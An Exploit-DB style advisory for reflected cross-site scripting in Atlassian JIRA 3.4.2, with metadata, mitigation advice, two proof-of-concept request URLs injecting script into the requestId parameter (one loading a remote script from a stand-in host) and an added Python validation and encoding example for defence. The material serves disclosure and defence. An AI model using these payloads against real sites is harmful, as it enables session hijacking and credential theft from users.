Vendor: JIRA
By: Not provided
CVSS: 7.5 (HIGH)
CWE: 79 (Cross-Site Scripting (XSS))
Product Name: JIRA
Affected Version From: Prior versions to 3.4.2
Affected Version To: 3.4.2002
Patch Exists: YES
Related CWE: Not provided
CPE: a:atlassian:jira:3.4.2
Metasploit:
Other Scripts:
Platforms Tested:
2007

Multiple Cross-Site Scripting Vulnerabilities in Atlassian JIRA

The Atlassian JIRA application fails to properly sanitize user-supplied input, leading to multiple cross-site scripting vulnerabilities. An attacker can exploit this to run arbitrary script code in a victim user's browser, which can be used to steal authentication credentials and launch further attacks.

Mitigation:

Atlassian JIRA users should upgrade to version 3.4.2 or later to mitigate these vulnerabilities. It is also recommended to sanitize user input to prevent XSS attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/23244/info

Atlassian JIRA is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Version 3.4.2 is affected; prior versions may also be vulnerable. 

http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script
http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http://www.example2.com/re.js></script>
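
The mitigation advice above (sanitize user input), as an added example that is not Atlassian's code or part of the original advisory: an allow-list check on `requestId` paired with attribute-context output encoding, run over constructed sample requests that include the two shapes quoted above. It assumes `requestId` is a numeric id and that it is echoed into a double-quoted HTML attribute (here a hypothetical hidden field); neither detail is stated on the page.

```python
import html
import re
from urllib.parse import urlsplit, unquote_plus

# Assumption: requestId is a numeric saved-filter id (the page does not give its format).
REQUEST_ID_RE = re.compile(r"[0-9]{1,18}")

# Constructed sample requests: one benign, the two request shapes quoted on the page,
# and one without the parameter.
SAMPLE_URLS = [
    'http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId=10000',
    'http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><script>alert("xss");</script',
    'http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide&requestId="><scriptsrc=http://www.example2.com/re.js></script>',
    'http://www.example.com/path/secure/IssueNavigator.jspa?mode=hide',
]

def extract_request_id(url):
    """Return the decoded requestId value from a URL, or None if absent."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if unquote_plus(key) == "requestId":
            return unquote_plus(value)
    return None

def is_valid_request_id(value):
    """Input check: allow-list of digits only, never a deny-list of tags."""
    return value is not None and REQUEST_ID_RE.fullmatch(value) is not None

def render_hidden_field(value):
    """Output check: encode for a double-quoted HTML attribute (hypothetical field)."""
    return '<input type="hidden" name="requestId" value="%s">' % html.escape(value, quote=True)

def triage(urls):
    """Label each request 'ok', 'rejected' or 'missing' by its requestId."""
    labels = []
    for url in urls:
        value = extract_request_id(url)
        if value is None:
            labels.append("missing")
        else:
            labels.append("ok" if is_valid_request_id(value) else "rejected")
    return labels

if __name__ == "__main__":
    for url, label in zip(SAMPLE_URLS, triage(SAMPLE_URLS)):
        print(label, render_hidden_field(extract_request_id(url) or ""))
```

The same `triage` function can be pointed at request URLs pulled from access logs to flag non-numeric `requestId` values; the encoding step is what keeps the value inert even if validation is bypassed or relaxed.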